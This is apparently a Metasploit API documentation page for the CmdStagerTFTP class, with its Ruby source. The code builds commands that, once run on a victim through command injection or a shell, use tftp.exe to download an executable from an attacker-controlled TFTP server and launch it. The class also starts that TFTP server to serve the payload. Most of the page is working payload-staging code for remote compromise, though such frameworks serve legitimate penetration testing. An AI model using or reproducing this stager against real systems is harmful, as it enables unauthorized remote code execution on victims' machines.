class Rex::Exploitation::CmdStagerTFTP

This class provides the ability to create a sequence of commands from an executable. When this sequence is ran via command injection or a shell, the resulting exe will be written to disk and executed.

This particular version uses tftp.exe to download a binary from the specified server. The original file is preserve, not encoded at all, and so this version is significantly simpler than other methods.

Requires: tftp.exe, outbound udp connectivity to a tftp server

Written by Joshua J. Drake

Attributes

exe[R]

NOTE: We don’t use a concatenation operator here since we only have a couple commands. There really isn’t any need to combine them. Also, the ms01_026 exploit depends on the start command being issued separately so that it can ignore it :)

payload_exe[R]
tftp[RW]

Public Class Methods

new(exe) click to toggle source
Calls superclass method Rex::Exploitation::CmdStagerBase::new
# File lib/rex/exploitation/cmdstager/tftp.rb, line 27
def initialize(exe)
  super
  @payload_exe = Rex::Text.rand_text_alpha(8) + ".exe"
end

Public Instance Methods

compress_commands(cmds, opts) click to toggle source

We override compress commands just to stick in a few extra commands last second..

# File lib/rex/exploitation/cmdstager/tftp.rb, line 47
def compress_commands(cmds, opts)
  # Initiate the download
  cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:transid]} #{@tempdir + @payload_exe}"

  # Make it all happen
  cmds << "start #{@tempdir + @payload_exe}"

  # Clean up after unless requested not to..
  if (not opts[:nodelete])
    # XXX: We won't be able to delete the payload while it is running..
  end

  super
end
setup(mod) click to toggle source
# File lib/rex/exploitation/cmdstager/tftp.rb, line 32
def setup(mod)
  tftp = Rex::Proto::TFTP::Server.new
  tftp.register_file(Rex::Text.rand_text_alphanumeric(8), exe)
  tftp.start
  mod.add_socket(tftp) # Hating myself for doing it... but it's just a first demo
end
teardown(mod = nil) click to toggle source
# File lib/rex/exploitation/cmdstager/tftp.rb, line 39
def teardown(mod = nil)
  tftp.stop
end